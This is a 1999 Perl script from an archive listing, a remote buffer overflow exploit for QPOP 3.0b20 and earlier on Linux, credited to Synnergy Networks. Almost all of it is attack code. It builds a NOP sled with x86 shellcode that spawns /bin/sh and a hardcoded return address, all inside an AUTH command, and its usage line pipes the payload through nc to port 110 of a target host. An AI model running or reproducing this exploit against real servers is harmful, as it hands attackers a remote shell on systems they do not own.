home *** CD-ROM | disk | FTP | other *** search
- #!/usr/bin/perl
- # *** Synnergy Networks
-
- # * Description:
- #
- # Remote buffer overflow exploit for QPOP 3.0b<=20
- # running on Linux.
- # (based on code by sk8@lucid-solutions.com)
-
- # * Author:
- #
- # headflux (hf@synnergy.net)
- # Synnergy Networks (c) 1999, http://www.synnergy.net
-
- # * Usage:
- # ./qpop-linux.pl <offset> | nc -v <hostname> 110
-
- # *** Synnergy Networks
-
- $nop = "\x90";
- #$offset = 0;
-
- $shell = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa";
- $shell .= "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04";
- $shell .= "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff";
- $shell .= "\xff\xff/bin/sh";
-
- #$i = 0;
- $buflen = 990;
- $ret = 0xbfffd304;
- $cmd = "AUTH ";
-
- if(defined $ARGV[0])
- {
- $offset = $ARGV[0];
- }
-
- $buf = $nop x $buflen;
- substr($buf, 0, length($cmd)) = "$cmd";
- substr($buf, 800, length($shell)) = "$shell";
-
- for ($i=800+length($shell) + 2; $i < $buflen - 4; $i += 4)
- {
- substr($buf, $i, length($ret + offset)) = pack(l,$ret + $offset);
- }
-
- # substr($buf, $buflen - 2, 1) = "\n";
- # substr($buf, $buflen - 1, 1) = "\n";
-
- #$buf .= "\n";
-
- printf STDOUT "$buf\n";
-
- # EndOfFile
-